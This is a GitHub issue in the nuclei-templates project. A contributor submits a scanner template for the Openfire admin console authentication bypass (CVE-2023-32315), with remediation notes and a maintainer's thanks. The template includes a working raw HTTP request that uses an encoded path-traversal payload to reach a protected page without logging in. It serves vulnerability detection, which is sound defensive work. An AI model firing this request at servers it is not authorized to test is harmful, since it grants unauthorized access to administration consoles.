projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License
9.27k stars 2.63k forks source link

Administration Console authentication bypass in openfire xmppserver #7325

Closed vsh00t closed 1 year ago

vsh00t commented 1 year ago

Template Information:

An important security issue affects a range of versions of Openfire, the cross-platform real-time collaboration server based on the XMPP protocol that is created by the Ignite Realtime community.

reference:

Nuclei Template:

id: CVE-2023-32315

info:
  name: Administration Console authentication bypass in openfire xmppserver
  author: vsh00t
  severity: high
  description: |
    An important security issue affects a range of versions of Openfire, the cross-platform real-time collaboration server based on the XMPP protocol that is created by the Ignite Realtime community.
  remediation: The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0).
  reference:
    - https://github.com/advisories/GHSA-gw42-f939-fhvm
  classification:
    cve-id: CVE-2023-32315
  metadata:
    max-request: 2
    verified: "true"
  tags: authentication,bypass,cve,cve2023

http:
  - raw:
      - |+
        GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}

    unsafe: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "apache"
          - "java"
          - "openfire"
          - "jivesoftware"
        part: body
        condition: or

[CVE-2023-32315] [http] [high] http://IPADD:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp

DhiyaneshGeek commented 1 year ago

Hi @vsh00t Thank you so much for sharing this template, i have raised a PR #7334 .

Cheers 🍻